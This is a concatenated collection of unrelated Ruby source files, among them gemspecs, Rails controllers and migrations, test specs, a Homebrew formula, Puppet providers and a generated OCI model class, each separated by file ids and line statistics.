s.add_development_dependency(%q<bundler>.freeze, [">= 1.15.0", "< 3.0"])
else
s.add_dependency(%q<parallel>.freeze, ["~> 1.10"])
s.add_dependency(%q<parser>.freeze, [">= 2.7.1.5"])
s.add_dependency(%q<rainbow>.freeze, [">= 2.2.2", "< 4.0"])
s.add_dependency(%q<regexp_parser>.freeze, [">= 1.8"])
s.add_dependency(%q<rexml>.freeze, [">= 0"])
s.add_dependency(%q<rubocop-ast>.freeze, [">= 1.0.1"])
s.add_dependency(%q<ruby-progressbar>.freeze, ["~> 1.7"])
s.add_dependency(%q<unicode-display_width>.freeze, [">= 1.4.0", "< 2.0"])
s.add_dependency(%q<bundler>.freeze, [">= 1.15.0", "< 3.0"])
end
end
| 53.622642 | 368 | 0.668543 |
18c33ac55806260d54b319c8a0ee279b42b9e298 | 1,407 | # == Schema Information
#
# Table name: projects
#
# id :integer not null, primary key
# title :string not null
# description :string
# created_at :datetime not null
# updated_at :datetime not null
# icon_file_name :string
# icon_content_type :string
# icon_file_size :integer
# icon_updated_at :datetime
# base64_icon_data :text
# slug :string not null
# organization_id :integer not null
# aasm_state :string
# long_description_body :text
# long_description_markdown :text
# open_posts_count :integer default(0), not null
# closed_posts_count :integer default(0), not null
#
# Factory for Project records. The :with_s3_icon trait fills in the icon_*
# columns as if an image attachment already existed, without uploading one.
FactoryGirl.define do
  factory :project do
    sequence(:title) { |n| "Project#{n}" }
    sequence(:description) { |n| "Project description #{n}" }
    sequence(:long_description_markdown) { |n| "Long project description #{n}" }
    association :organization

    trait :with_s3_icon do
      # The evaluator argument is unused; underscore it to say so explicitly.
      after(:build) do |project, _evaluator|
        project.icon_file_name = 'project.jpg'
        project.icon_content_type = 'image/jpeg'
        project.icon_file_size = 1024
        project.icon_updated_at = Time.now
      end
    end
  end
end
| 33.5 | 80 | 0.567875 |
1ce6ba2251bcad7fe3da63406a90578e2fe1df7f | 158 | describe command('curl http://localhost:9093/metrics') do
# The local metrics endpoint must respond (curl exits 0) and expose Go
# runtime metrics. NOTE(review): port 9093 is presumably Alertmanager's
# default — confirm which service this profile targets.
its('exit_status') { should eq 0 }
its('stdout') { should match(/go_gc_duration_seconds/) }
end
| 31.6 | 58 | 0.71519 |
e99c5c2089a5a28a9026384ea38c77d88246483d | 1,459 | Pod::Spec.new do |spec|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
spec.name = "EthosText"
# NOTE(review): spec.version (0.1.9) does not match the source tag below
# (v0.5.44) — confirm which release this podspec is meant to publish.
spec.version = "0.1.9"
spec.summary = "A collection of useful building blocks to help rapidly develop iOS apps using Swift"
spec.description = <<-DESC
A collection of useful building blocks to help rapidly develop iOS apps using Swift and more
DESC
spec.homepage = "https://github.com/egouletlang/Ethos"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
# NOTE(review): this first license assignment is immediately overwritten by
# the hash form on the next line and can likely be removed.
spec.license = "MIT (example)"
spec.license = { :type => 'MIT', :file => 'LICENSE' }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
spec.author = { "Etienne Goulet-Lang" => "[email protected]" }
# spec.social_media_url = "https://twitter.com/egouletlang"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
spec.swift_version = '4.2'
spec.platform = :ios, '11.0'
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
spec.source = { :git => "https://github.com/egouletlang/Ethos.git", :tag => "v0.5.44" }
spec.source_files = 'EthosText/EthosText/**/*.{h,m,swift}'
# ――― Dependencies ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
spec.dependency 'EthosUtil'
end
| 37.410256 | 107 | 0.446196 |
799bb33edbf5e14b86b550bd76ef8ab7202d252b | 139 | class AddHstore < ActiveRecord::Migration
# Enables the PostgreSQL hstore extension for this database.
def up
enable_extension :hstore
end
# Removes the hstore extension on rollback.
def down
disable_extension :hstore
end
end | 15.444444 | 43 | 0.726619 |
ab59a1bfca1c5699aedf99ec36674892a74b09ad | 1,203 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'google/apis/blogger_v3/service.rb'
require 'google/apis/blogger_v3/classes.rb'
require 'google/apis/blogger_v3/representations.rb'
module Google
module Apis
# Blogger API
#
# API for access to the data within Blogger.
#
# @see https://developers.google.com/blogger/docs/3.0/getting_started
module BloggerV3
# API version identifier used in request paths.
VERSION = 'V3'
# Upstream API revision this client was generated against (date-stamped).
REVISION = '20190917'
# Manage your Blogger account
AUTH_BLOGGER = 'https://www.googleapis.com/auth/blogger'
# View your Blogger account
AUTH_BLOGGER_READONLY = 'https://www.googleapis.com/auth/blogger.readonly'
end
end
end
| 31.657895 | 80 | 0.727348 |
033121bb1f70e282990189ec3a520b93c62f84b3 | 2,848 | class Metricbeat < Formula
desc "Collect metrics from your systems and services"
homepage "https://www.elastic.co/beats/metricbeat"
url "https://github.com/elastic/beats.git",
tag: "v7.13.1",
revision: "2d80f6e99f41b65a270d61706fa98d13cfbda18d"
license "Apache-2.0"
head "https://github.com/elastic/beats.git"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "a287b24bc4128d7305b7bb2b039adb5f912e9cae13e69080f67ff836e833dbff"
sha256 cellar: :any_skip_relocation, big_sur: "d78fec2894a40070d01fa89fd2ced85e829d1b9e9c240a3d890259dbbb9060eb"
sha256 cellar: :any_skip_relocation, catalina: "94c41bdd226dd43a1da8ae038a4e59eb7417d848bc5c9a75a5a7e2fdca8ba2dc"
sha256 cellar: :any_skip_relocation, mojave: "ca4cff77fa3623f81c337b739eec36170e4affafde09ded62caafe4c13b2bbab"
end
depends_on "go" => :build
depends_on "mage" => :build
depends_on "[email protected]" => :build
# Builds the OSS metricbeat binary with mage and installs it together with
# its default configuration, then writes a wrapper script pinning all
# runtime paths into Homebrew's prefix.
def install
# remove non open source files
rm_rf "x-pack"
cd "metricbeat" do
# don't build docs because it would fail creating the combined OSS/x-pack
# docs and we aren't installing them anyway
inreplace "magefile.go", "mg.Deps(CollectDocs, FieldsDocs)", ""
system "mage", "-v", "build"
# NOTE(review): deparallelize suggests `mage update` is not parallel-safe —
# confirm before changing.
ENV.deparallelize
system "mage", "-v", "update"
(etc/"metricbeat").install Dir["metricbeat.*", "fields.yml", "modules.d"]
(libexec/"bin").install "metricbeat"
prefix.install "build/kibana"
end
# Wrapper so users get Homebrew-local config/data/log directories.
(bin/"metricbeat").write <<~EOS
#!/bin/sh
exec #{libexec}/bin/metricbeat \
--path.config #{etc}/metricbeat \
--path.data #{var}/lib/metricbeat \
--path.home #{prefix} \
--path.logs #{var}/log/metricbeat \
"$@"
EOS
end
plist_options manual: "metricbeat"
# launchd property list: starts the metricbeat wrapper when the service is
# loaded (RunAtLoad).
def plist
<<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>Program</key>
<string>#{opt_bin}/metricbeat</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
(testpath/"config/metricbeat.yml").write <<~EOS
metricbeat.modules:
- module: system
metricsets: ["load"]
period: 1s
output.file:
enabled: true
path: #{testpath}/data
filename: metricbeat
EOS
(testpath/"logs").mkpath
(testpath/"data").mkpath
fork do
exec bin/"metricbeat", "-path.config", testpath/"config", "-path.data",
testpath/"data"
end
sleep 30
assert_predicate testpath/"data/metricbeat", :exist?
end
end
| 30.297872 | 122 | 0.63132 |
bbb27f895418dca3b1e31e69f6957c84a03510e6 | 466 | require 'mustache'
module RspecApiDocumentation
module Views
# Mustache view model backing the generated documentation index page.
class MarkupIndex < Mustache
def initialize(index, configuration)
@index = index
@configuration = configuration
# Point Mustache at the configured template directory.
self.template_path = configuration.template_path
end
# Name of the documented API, exposed to the template.
def api_name
@configuration.api_name
end
# Grouped example sections for the index template.
# NOTE(review): relies on #examples which is not defined in this class —
# presumably provided by a subclass; confirm.
def sections
RspecApiDocumentation::Writers::IndexHelper.sections(examples, @configuration)
end
end
end
end
| 21.181818 | 86 | 0.678112 |
26b82610e62e00bd682c8789591202099a5cccf1 | 1,185 | # frozen_string_literal: true
require 'test_helper'
require 'skippy/library'
# Unit tests for Skippy::Library: loading metadata, failing on missing
# paths, module discovery and string conversion — all driven from the
# my_lib fixture. The repeated fixture/library construction is extracted
# into a shared private helper.
class SkippyLibraryTest < Skippy::Test
  def test_that_it_can_load_library_info
    lib_path = fixture('my_lib')
    library = Skippy::Library.new(lib_path)
    assert_equal(lib_path, library.path)
    assert_equal('my-lib', library.name)
    assert_equal('1.2.3', library.version)
  end

  def test_that_it_fails_when_library_path_does_not_exist
    assert_raises(Skippy::Library::LibraryNotFoundError) do
      Skippy::Library.new('./bogus/path')
    end
  end

  def test_that_it_can_find_library_modules
    library = my_lib_library
    assert_all_kind_of(Skippy::LibModule, library.modules)
    assert_same_elements(
      %w(my-lib/command my-lib/geometry my-lib/tool),
      library.modules.map(&:to_s)
    )
  end

  def test_that_it_return_its_name
    assert_equal('my-lib', my_lib_library.name)
  end

  def test_that_it_convert_to_string_as_name
    assert_equal('my-lib', my_lib_library.to_s)
  end

  private

  # Shared fixture loader: a Skippy::Library built from the my_lib fixture.
  def my_lib_library
    Skippy::Library.new(fixture('my_lib'))
  end
end
| 26.333333 | 59 | 0.731646 |
26492db99a875fc9a2d835ef5fd948aa77e8b894 | 797 | ##
# Copyright 2015, Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
# Be sure to restart your server when you modify this file.
# Configure sensitive parameters which will be filtered from the log file.
# Matching request parameters are shown as [FILTERED] in the logs.
Rails.application.config.filter_parameters += [:password]
| 37.952381 | 76 | 0.742785 |
6aaeaa96058158f0d2aa3d44f817000f650d3cd7 | 2,240 | # frozen_string_literal: true
# Manages the CRUD lifecycle of Ideas plus an explicit "submit" step that
# stamps a submission date and moves the idea into the approval queue.
class IdeasController < ApplicationController
  before_action :authenticate_user!
  before_action :set_idea, only: %i[show edit update destroy submit]

  # GET /ideas
  # GET /ideas.json
  #
  # params[:view] selects the listing:
  # * 'assigned'  - ideas assigned to the current user
  # * 'submitted' - ideas with a submission_date
  # * otherwise   - all ideas
  def index
    @ideas = case params[:view]
             when 'assigned'
               Idea.where(assigned_user_id: [current_user.id])
             when 'submitted'
               Idea.where.not(submission_date: [nil, ''])
             else
               Idea.all
             end
  end

  # GET /ideas/1
  # GET /ideas/1.json
  def show; end

  # GET /ideas/new
  def new
    @idea = Idea.new
  end

  # GET /ideas/1/edit
  def edit; end

  # POST /ideas
  def create
    @idea = current_user.ideas.new(idea_params)
    if @idea.save
      redirect_to @idea, notice: 'Idea was successfully created.'
    else
      render :new
    end
  end

  # PATCH/PUT /ideas/1
  def update
    if @idea.update(idea_params)
      redirect_to @idea, notice: 'Idea was successfully updated.'
    else
      render :edit
    end
  end

  # DELETE /ideas/1
  def destroy
    @idea.destroy
    redirect_to ideas_url, notice: 'Idea was successfully destroyed.'
  end

  # Marks the idea as submitted: records the submission time and moves it
  # into the awaiting_approval status.
  def submit
    @idea.submission_date = Time.now
    @idea.status = Idea.statuses[:awaiting_approval]
    if @idea.save
      redirect_to @idea, notice: 'Idea was successfully submitted.'
    else
      render :edit
    end
  end

  private

  # Use callbacks to share common setup or constraints between actions.
  # (submit is routed with :idea_id; the member actions use :id.)
  def set_idea
    @idea = Idea.find(params[:id] || params[:idea_id])
  end

  # Strong-parameter whitelist. All users may set the base attributes;
  # admins may additionally assign a user, set the participation level and
  # schedule a review. The two previously duplicated permit lists are now
  # derived from a single base list.
  def idea_params
    permitted = %i[
      area_of_interest business_area it_system title idea benefits impact
      involvement status
    ]
    permitted += %i[assigned_user_id participation_level review_date] if current_user.admin?
    params.require(:idea).permit(*permitted)
  end
end
| 21.132075 | 86 | 0.603125 |
3300839f7d028a8819da0ca6741a4522c38b8296 | 764 | #!/usr/bin/ruby
# STEPS TO RUNNING BULK-EXTRACT FROM SCRATCH
#start mongod
#run sli/config/scripts/resetAllDbs.sh to clean database
#start activemq
#start api to bootstrap database
#start search indexer
#bundle exec rake realmInit
#bundle exec rake importSandboxData
#run ./compile_local_extract_jar.rb
#then run this script! ./start_local_extract.rb
# configuration variables
sli_conf="../../config/properties/sli.properties"
sli_keystore="../../data-access/dal/keyStore/ciKeyStore.jks"
bulk_extract_jar=`ls ../target/bulk-extract-*.jar`
tenant="Midgar"
is_delta="false"
# run it!
puts "starting extract"
`java -Xms1G -Xmx2G -Dsli.conf=#{sli_conf} -Dsli.encryption.keyStore=#{sli_keystore} -jar #{bulk_extract_jar} #{tenant} #{is_delta}`
puts "post extract"
| 28.296296 | 132 | 0.769634 |
035e8916166481692f95c6efbb3ee6cf15fcdab0 | 1,117 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::Audit::Events::Preloader do
describe '.preload!' do
let_it_be(:audit_events) { create_list(:audit_event, 2) }
let(:audit_events_relation) { AuditEvent.where(id: audit_events.map(&:id)) }
subject { described_class.preload!(audit_events_relation) }
it 'returns an ActiveRecord::Relation' do
expect(subject).to be_an(ActiveRecord::Relation)
end
it 'preloads associated records' do
log = ActiveRecord::QueryRecorder.new do
subject.map do |event|
[event.author_name, event.lazy_entity.name]
end
end
# Expected queries when requesting for AuditEvent with associated records
#
# 1. On the audit_events table
# SELECT "audit_events".* FROM "audit_events"
# 2. On the users table for author_name
# SELECT "users".* FROM "users" WHERE "users"."id" IN (1, 3)
# 3. On the users table for entity name
# SELECT "users".* FROM "users" WHERE "users"."id" IN (2, 4)
#
expect(log.count).to eq(3)
end
end
end
| 30.189189 | 80 | 0.652641 |
b93bc6f65dea3f1bce856c6be3c57164165c9319 | 359 | class ContactsController < ApplicationController
# Renders the contact form with a fresh, unsaved Contact.
def new
@contact = Contact.new
end
# Builds a Contact from the submitted attributes. Valid submissions are
# mailed to the site owner and redirected home with a thank-you flash;
# invalid ones re-render the form.
def create
  @contact = Contact.new(params[:contact])
  unless @contact.valid?
    render 'new'
    return
  end
  ContactMailer.message_from_user(@contact).deliver_now
  flash[:info] = "Thank you for your message!"
  redirect_to root_path
end
end
| 21.117647 | 59 | 0.679666 |
876db06a2b9eafe093adffc1cefdc1307c6808d9 | 5,980 | require 'pathname'
require 'json'
require_relative '../../../puppet_x/puppetlabs/dsc_lite/powershell_hash_formatter'
Puppet::Type.type(:base_dsc_lite).provide(:powershell) do
# Provider preconditions: requires the pwshlib gem feature and Windows.
confine feature: :pwshlib
confine operatingsystem: :windows
defaultfor operatingsystem: :windows
# Prefer the sysnative alias (reaches 64-bit PowerShell from a 32-bit
# process), then the system32 copy, finally whatever powershell.exe is on
# PATH.
commands powershell: (if File.exist?("#{ENV['SYSTEMROOT']}\\sysnative\\WindowsPowershell\\v1.0\\powershell.exe")
"#{ENV['SYSTEMROOT']}\\sysnative\\WindowsPowershell\\v1.0\\powershell.exe"
elsif File.exist?("#{ENV['SYSTEMROOT']}\\system32\\WindowsPowershell\\v1.0\\powershell.exe")
"#{ENV['SYSTEMROOT']}\\system32\\WindowsPowershell\\v1.0\\powershell.exe"
else
'powershell.exe'
end)
desc 'Applies DSC Resources by generating a configuration file and applying it.'
# Warning text shown (once per run, via upgrade_message) when the agent's
# Ruby prevents the shared-PowerShell-process performance optimisation.
DSC_LITE_MODULE_PUPPET_UPGRADE_MSG = <<-UPGRADE.freeze
Currently, the dsc module has reduced functionality on this agent
due to one or more of the following conditions:
- Puppet 3.x (non-x64 version)
Puppet 3.x uses a Ruby version that requires a library to support a colored
console. Unfortunately this library prevents the PowerShell module from
using a shared PowerShell process to dramatically improve the performance of
resource application.
To enable these improvements, it is suggested to upgrade to any x64 version of
Puppet (including 3.x), or to a Puppet version newer than 3.x.
UPGRADE
# Logs DSC_LITE_MODULE_PUPPET_UPGRADE_MSG as a Puppet warning at most once
# per process, tracked via the @upgrade_warning_issued class ivar.
def self.upgrade_message
Puppet.warning DSC_LITE_MODULE_PUPPET_UPGRADE_MSG unless @upgrade_warning_issued
@upgrade_warning_issued = true
end
# Absolute path to the DSC resources vendored with this module
# (puppet_x/dsc_resources, three directories up from this provider file).
def self.vendored_modules_path
  # Same result as the previous Pathname-based expression, using a single
  # File.expand_path call with a base directory instead of building
  # intermediate Pathname objects.
  File.expand_path('../../../puppet_x/dsc_resources', File.dirname(__FILE__))
end
# Resource parameters carrying a value whose names look like DSC properties.
# NOTE(review): the regex is unanchored, so any name containing "dsc_"
# matches, not only names starting with it.
def dsc_parameters
resource.parameters_with_value.select do |p|
p.name.to_s =~ %r{dsc_}
end
end
# Returns only the :properties parameter (dsc_lite collects all DSC
# properties under it) from the parameters that carry a value.
#
# The original chained a `.each` that matched names against /dsc_/ and
# discarded the result; since Enumerable#each returns its receiver, the
# chain was a no-op and has been removed — behavior is identical.
def dsc_property_param
  resource.parameters_with_value.select { |pr| pr.name == :properties }
end
def self.template_path
File.expand_path(Pathname.new(__FILE__).dirname)
end
def ps_manager
debug_output = Puppet::Util::Log.level == :debug
Pwsh::Manager.instance(command(:powershell), Pwsh::Manager.powershell_args, debug: debug_output)
end
DSC_LITE_COMMAND_TIMEOUT = 1_200_000 # 20 minutes
def exists?
version = Facter.value(:powershell_version)
Puppet.debug "PowerShell Version: #{version}"
script_content = ps_script_content('test')
Puppet.debug "\n" + self.class.redact_content(script_content)
if Pwsh::Manager.windows_powershell_supported?
output = ps_manager.execute(script_content, DSC_LITE_COMMAND_TIMEOUT)[:stdout]
else
self.class.upgrade_message
output = powershell(Pwsh::Manager.powershell_args, script_content)
end
Puppet.debug "Dsc Resource returned: #{output}"
data = JSON.parse(output)
raise(data['errormessage']) unless data['errormessage'].empty?
exists = data['indesiredstate']
Puppet.debug "Dsc Resource Exists?: #{exists}"
Puppet.debug "dsc_ensure: #{resource[:dsc_ensure]}" if resource.parameters.key?(:dsc_ensure)
Puppet.debug "ensure: #{resource[:ensure]}"
exists
end
def create
script_content = ps_script_content('set')
Puppet.debug "\n" + self.class.redact_content(script_content)
if Pwsh::Manager.windows_powershell_supported?
output = ps_manager.execute(script_content, DSC_LITE_COMMAND_TIMEOUT)[:stdout]
else
self.class.upgrade_message
output = powershell(Pwsh::Manager.powershell_args, script_content)
end
Puppet.debug "Create Dsc Resource returned: #{output}"
data = JSON.parse(output)
raise(data['errormessage']) unless data['errormessage'].empty?
notify_reboot_pending if data['rebootrequired'] == true
data
end
def notify_reboot_pending
Puppet.info 'A reboot is required to progress further. Notifying Puppet.'
reboot_resource = resource.catalog.resource(:reboot, 'dsc_reboot')
unless reboot_resource
Puppet.warning "No reboot resource found in the graph that has 'dsc_reboot' as its name. Cannot signal reboot to Puppet."
return
end
if reboot_resource.provider.respond_to?(:reboot_required)
# internal API used to let reboot resource knows a reboot is pending
reboot_resource.provider.reboot_required = true
else
Puppet.warning 'Reboot module must be updated, since resource does not have :reboot_required method implemented. Cannot signal reboot to Puppet.'
return
end
end
def self.format_dsc_lite(dsc_value)
PuppetX::PuppetLabs::DscLite::PowerShellHashFormatter.format(dsc_value)
end
def self.escape_quotes(text)
text.gsub("'", "''")
end
def self.redact_content(content)
# Note that here we match after an equals to ensure we redact the value being passed, but not the key.
# This means a redaction of a string not including '= ' before the string value will not redact.
# Every secret unwrapped in this module will unwrap as "'secret' # PuppetSensitive" and, currently,
# always inside a hash table to be passed along. This means we can (currently) expect the value to
# always come after an equals sign.
# Note that the line may include a semi-colon and/or a newline character after the sensitive unwrap.
content.gsub(%r{= '.+' # PuppetSensitive;?(\\n)?$}, "= '[REDACTED]'")
end
def ps_script_content(mode)
self.class.ps_script_content(mode, resource, self)
end
def self.ps_script_content(mode, resource, provider)
dsc_invoke_method = mode
@param_hash = resource
template_name = resource.generic_dsc ? '/invoke_generic_dsc_resource.ps1.erb' : '/invoke_dsc_resource.ps1.erb'
file = File.new(template_path + template_name, encoding: Encoding::UTF_8)
template = ERB.new(file.read, nil, '-')
template.result(binding)
end
end
| 38.580645 | 151 | 0.714548 |
08a3d6179f7529c90df44cdcebafa7096ade53f2 | 1,078 | # This file is copied to spec/ when you run 'rails generate rspec:install'
ENV["RAILS_ENV"] ||= 'test'
require File.expand_path("../../config/environment", __FILE__)
require 'rspec/rails'
# Requires supporting ruby files with custom matchers and macros, etc,
# in spec/support/ and its subdirectories.
Dir[Rails.root.join("spec/support/**/*.rb")].each {|f| require f}
RSpec.configure do |config|
# == Mock Framework
#
# If you prefer to use mocha, flexmock or RR, uncomment the appropriate line:
#
# config.mock_with :mocha
# config.mock_with :flexmock
# config.mock_with :rr
config.mock_with :rspec
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
config.include ActionView::TestCase::Behavior, example_group: {file_path: %r{spec/presenters}}
end
| 35.933333 | 96 | 0.734694 |
390de5543004af96efde84a001e5251778ae742f | 2,136 | require 'singleton'
module JSRailsRoutes
  # Generates a JavaScript file that exposes Rails named routes as
  # `<name>_path(params)` helper functions. Route/name inclusion is
  # controlled by the four regexp accessors; output goes to `path`.
  class Generator
    # Matches one ":param" path segment, capturing the parameter name and the
    # delimiter that follows it ("/" or end of string).
    COMPARE_REGEXP = %r{:(.*?)(/|$)}
    # JavaScript runtime helper emitted at the top of the generated file;
    # appends any params not consumed as path segments to the query string.
    PROCESS_FUNC = <<-JAVASCRIPT.freeze
function process(route, params, keys) {
  var query = [];
  for (var param in params) if (params.hasOwnProperty(param)) {
    if (keys.indexOf(param) === -1) {
      query.push(param + "=" + encodeURIComponent(params[param]));
    }
  }
  return query.length ? route + "?" + query.join("&") : route;
}
    JAVASCRIPT
    include Singleton
    attr_accessor :include_paths, :exclude_paths, :include_names, :exclude_names, :path
    def initialize
      self.include_paths = /.*/
      self.exclude_paths = /^$/
      self.include_names = /.*/
      self.exclude_names = /^$/
      self.path = Rails.root.join('app', 'assets', 'javascripts', 'rails-routes.js')
      Rails.application.reload_routes!
    end
    # Writes the routes file. +task+ is the rake task name embedded in the
    # "don't edit manually" banner comment.
    def generate(task)
      lines = ["// Don't edit manually. `rake #{task}` generates this file.", PROCESS_FUNC]
      lines += routes.map do |route_name, route_path|
        handle_route(route_name, route_path) if match?(route_name, route_path)
      end.compact
      lines += [''] # End with new line
      write(lines.join("\n"))
    end
    private
    # True when the route passes all four include/exclude filters.
    def match?(route_name, route_path)
      return false if include_paths !~ route_path
      return false if exclude_paths =~ route_path
      return false if include_names !~ route_name
      return false if exclude_names =~ route_name
      true
    end
    # Builds the exported JS helper for a single route.
    #
    # BUG FIX: the previous implementation called `sub!` directly on the
    # strings stored in the memoized #routes array, destructively rewriting
    # the cache on the first #generate call. Work on a copy instead, and use
    # MatchData rather than the $1/$2 Perl globals.
    def handle_route(route_name, route_path)
      keys = []
      js_path = route_path.dup
      while (m = js_path.match(COMPARE_REGEXP))
        keys.push("'#{m[1]}'")
        js_path.sub!(COMPARE_REGEXP, "' + params.#{m[1]} + '#{m[2]}")
      end
      "export function #{route_name}_path(params) { return process('#{js_path}', params, [#{keys.join(',')}]); }"
    end
    # Named routes as [name, path-without-optional-suffix] pairs, sorted by
    # name and memoized for the lifetime of the singleton.
    def routes
      @routes ||= Rails.application.routes.routes
                       .select(&:name)
                       .map { |r| [r.name, r.path.spec.to_s.split('(')[0]] }
                       .sort { |a, b| a[0] <=> b[0] }
    end
    def write(string)
      File.open(path, 'w') { |f| f.write(string) }
    end
  end
end
| 29.666667 | 116 | 0.594569 |
f8efcbd6a849ec3187f008a8923756354effaabf | 853 | Gem::Specification.new do |s|
s.name = 'jekyll-theme-merlot'
s.version = '0.1.1'
s.license = 'CC0-1.0'
s.authors = ['Cameron McEfee', 'GitHub, Inc.']
s.email = ['[email protected]']
s.homepage = 'https://github.com/stage/merlot'
s.summary = 'Merlot is a Jekyll theme for GitHub Pages'
s.files = `git ls-files -z`.split("\x0").select do |f|
f.match(%r{^((_includes|_layouts|_sass|assets)/|(LICENSE|README)((\.(txt|md|markdown)|$)))}i)
end
s.platform = Gem::Platform::RUBY
s.add_runtime_dependency 'jekyll', '> 3.5', '< 5.0'
s.add_runtime_dependency 'jekyll-seo-tag', '~> 2.0'
s.add_development_dependency 'html-proofer', '~> 3.0'
s.add_development_dependency 'rubocop', '~> 0.50'
s.add_development_dependency 'w3c_validators', '~> 1.3'
end
| 40.619048 | 97 | 0.622509 |
7a9d8a5c50338d3eeade5cc868e86e46dc365d83 | 48 | module OpenBadges
module TagsHelper
end
end
| 9.6 | 19 | 0.791667 |
e2e4793b42e7bd7753fdd979420a184eb25ca7dc | 1,536 | require 'puppet/util/agentil'
# Provider for agentil_landscape resources backed by the Agentil
# configuration file parsed by Puppet::Util::Agentil.
Puppet::Type.type(:agentil_landscape).provide(:agentil) do
  # One provider instance per landscape present in the parsed config.
  def self.instances
    instances = []
    Puppet::Util::Agentil.parse unless Puppet::Util::Agentil.parsed?
    Puppet::Util::Agentil.landscapes.each do |_index, landscape|
      instances << new(:name => landscape.name, :ensure => :present, :agentil_landscape => landscape)
    end
    instances
  end
  # Attach discovered providers to matching resources in the catalog.
  def self.prefetch(resources)
    instances.each do |prov|
      if (resource = resources[prov.name])
        resource.provider = prov
      end
    end
  end
  def exists?
    get(:ensure) != :absent
  end
  # Create a new landscape in the parsed model; a sid is mandatory.
  def create
    raise Puppet::Error, 'Unable to create a new landscape with no sid being specified' unless resource[:sid]
    new_landscape = Puppet::Util::Agentil.add_landscape
    new_landscape.name = resource[:name]
    new_landscape.sid = resource[:sid]
    new_landscape.company = resource[:company] if resource[:company]
    new_landscape.description = resource[:description] if resource[:description]
    @property_hash[:agentil_landscape] = new_landscape
  end
  def destroy
    Puppet::Util::Agentil.del_landscape @property_hash[:agentil_landscape].id
    @property_hash.delete :agentil_landscape
  end
  # Getters and setters for simple properties delegate straight to the
  # underlying landscape model object.
  [:sid, :description, :company].each do |prop|
    define_method(prop) do
      @property_hash[:agentil_landscape].send(prop)
    end
    define_method("#{prop}=") do |new_value|
      @property_hash[:agentil_landscape].send("#{prop}=", new_value)
    end
  end
  # Write any pending model changes back to the configuration file.
  def flush
    Puppet::Util::Agentil.sync
  end
end
| 28.444444 | 110 | 0.69987 |
793854f26848d0fbb959969ff5bec80e610a3308 | 7,510 | # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
# NOTE: auto-generated model (see header); edit the codegen source, not this
# file — manual changes are overwritten on regeneration.
module OCI
  # Details for updating the dedicated virtual machine host details.
  #
  class Core::Models::UpdateDedicatedVmHostDetails
    # Defined tags for this resource. Each key is predefined and scoped to a
    # namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
    #
    # Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
    #
    # @return [Hash<String, Hash<String, Object>>]
    attr_accessor :defined_tags
    # A user-friendly name. Does not have to be unique, and it's changeable.
    # Avoid entering confidential information.
    #
    # Example: `My dedicated VM host`
    #
    # @return [String]
    attr_accessor :display_name
    # Free-form tags for this resource. Each tag is a simple key-value pair with no
    # predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
    #
    # Example: `{\"Department\": \"Finance\"}`
    #
    # @return [Hash<String, String>]
    attr_accessor :freeform_tags
    # Attribute mapping from ruby-style variable name to JSON key.
    def self.attribute_map
      {
        # rubocop:disable Style/SymbolLiteral
        'defined_tags': :'definedTags',
        'display_name': :'displayName',
        'freeform_tags': :'freeformTags'
        # rubocop:enable Style/SymbolLiteral
      }
    end
    # Attribute type mapping.
    def self.swagger_types
      {
        # rubocop:disable Style/SymbolLiteral
        'defined_tags': :'Hash<String, Hash<String, Object>>',
        'display_name': :'String',
        'freeform_tags': :'Hash<String, String>'
        # rubocop:enable Style/SymbolLiteral
      }
    end
    # rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
    # rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
    # Initializes the object
    # @param [Hash] attributes Model attributes in the form of hash
    # @option attributes [Hash<String, Hash<String, Object>>] :defined_tags The value to assign to the {#defined_tags} property
    # @option attributes [String] :display_name The value to assign to the {#display_name} property
    # @option attributes [Hash<String, String>] :freeform_tags The value to assign to the {#freeform_tags} property
    def initialize(attributes = {})
      return unless attributes.is_a?(Hash)
      # convert string to symbol for hash key
